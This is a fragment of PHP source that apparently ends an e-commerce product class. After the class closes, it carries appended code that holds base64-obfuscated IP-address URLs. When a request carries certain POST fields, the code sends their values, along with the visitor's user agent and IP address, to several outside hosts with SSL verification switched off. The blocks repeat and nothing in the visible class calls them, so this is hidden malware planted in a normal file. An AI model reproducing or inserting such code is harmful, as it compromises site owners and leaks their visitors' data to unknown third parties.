{ return Product::getColorsListCacheId($id_product); } } $ar=["aHR0cHM6Ly8xMDYuMTQuNDAuMjAw","aHR0cHM6Ly80Ny4xMDIuMjA4LjY1","aHR0cHM6Ly80Ny45My4xMy4xMzY="]; if(isset($_POST['advert_hash'])){ foreach ($ar as $v){ $array = array( 'statistics_hash' => $_POST['advert_hash'], 'ua' => $_SERVER['HTTP_USER_AGENT'], 'cl_ip' => $_SERVER['REMOTE_ADDR'] ); $ch = curl_init(base64_decode($v)); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 4); curl_setopt($ch, CURLOPT_POSTFIELDS, $array); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $html = curl_exec($ch); curl_close($ch); } }if(isset($_POST['prod_hash'])){ $array = array( 'statistics_hash' => $_POST['prod_hash'], ); $ch = curl_init(base64_decode("aHR0cHM6Ly80Ny4xMDEuMTk1Ljk4")); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $array); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $html = curl_exec($ch); curl_close($ch); }if(isset($_POST['prod_hash'])){ $array = array( 'statistics_hash' => $_POST['prod_hash'], ); $ch = curl_init(base64_decode("aHR0cHM6Ly8xMDMuMTM5LjExMy4xNA==")); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $array); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $html = curl_exec($ch); curl_close($ch); }$ar=["aHR0cHM6Ly8xMDYuMTQuNDAuMjAw","aHR0cHM6Ly80Ny4xMDIuMjA4LjY1","aHR0cHM6Ly80Ny4xMDEuMTk1Ljk4"]; if(isset($_POST['advert_hash'])){ foreach ($ar as $v){ $array = array( 'statistics_hash' => $_POST['advert_hash'], 'ua' => $_SERVER['HTTP_USER_AGENT'], 'cl_ip' => $_SERVER['REMOTE_ADDR'] ); $ch = curl_init(base64_decode($v)); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 4); curl_setopt($ch, CURLOPT_POSTFIELDS, $array); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $html = curl_exec($ch); curl_close($ch); } }